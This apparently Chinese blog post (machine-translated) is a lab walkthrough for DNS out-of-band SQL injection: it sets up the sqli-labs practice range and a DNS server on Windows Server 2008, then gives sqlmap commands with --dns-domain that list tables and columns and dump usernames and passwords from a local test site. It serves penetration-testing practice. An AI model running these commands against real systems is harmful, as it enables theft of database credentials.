当前位置:网站首页>sqlmap combined with dnslog fast injection
sqlmap combined with dnslog fast injection
2022-08-10 23:49:00 【hug kitten】
How to use sqlmap combined with dnslog to inject quickly
First we need three virtual machines, one Windows10 as the client, Windows server2008 as the server, and one kali.
The first step: first download the phpstudy skin panel on Windows10, then download the sqli-labs shooting range, and put the sqli-labs shooting range file into the WWW directory
Step 2: Modify the database configuration file and add secure_file_priv="" to the my.ini of the database to facilitate reading the file later
Step 3: Set up a DNS server on Windows server 2008
Click Role-->Add Role-->Click Server Role-->Select DNS Server-->Next-->Install
Right click to view the properties of WIN-JGVPSZCQ80R-->Monitor-->Tick the two test types-->OK
New area: Right-click New-->Next-->Customize an area name-->Next-->Finish
Create a new host ns1.ceshi.top, so fill in the IP address of the kali virtual machine
Create another pan-parse:
Step 4: Configure the IP of the DNS server on Windows 10
Step 5: Use the domain name created in Windows10ping DNS and view it in kali
Step 6: Create a repeater in Windows server2008
Use the domain name of the Windows10 ping forwarder and view it in kali
Step 7: sqlmap uses DNSlog out-of-band injection
We use sqlmap to find the table name in the database
sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D security --tables
Find the columns in the table according to the users table name
sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security"-t "users" --columns
Retrieve data from users table
sqlmap -u "http://192.168.112.139/sqli/sql/Less-8?id=1" --technique=T --dns-domain "hello.top" -D "security"-t "users" -C "username,password" --dump
边栏推荐
猜你喜欢
随机推荐
9. Rest 风格请求处理
开源一夏|OpenHarmony如何选择图片在Image组件上显示(eTS)
HGAME 2022 Week3 writeup
Parse method's parameter list (including parameter names)
SQL注入基础
CSAPP lab
SAS数据处理技术(一)
烘干衣服问题
逮到一个阿里 10 年老 测试开发,聊过之后收益良多...
ROS Experimental Notes - Install QPEP and Intel-MKL
Kubernetes 计算CPU 使用率
proxy代理服务_2
How to recover data from accidentally deleted U disk, how to recover deleted data from U disk
App基础优化三部曲:启动原理&黑白屏优化&启动时间优化
浅析工业互联网
There is no recycle bin for deleted files on the computer desktop, what should I do if the deleted files on the desktop cannot be found in the recycle bin?
web 性能提升(将持续更新……)
大厂社招:Android 高级工程师的面试题,你知道多少?
Talking about cors
Mathematical modeling preparation knowledge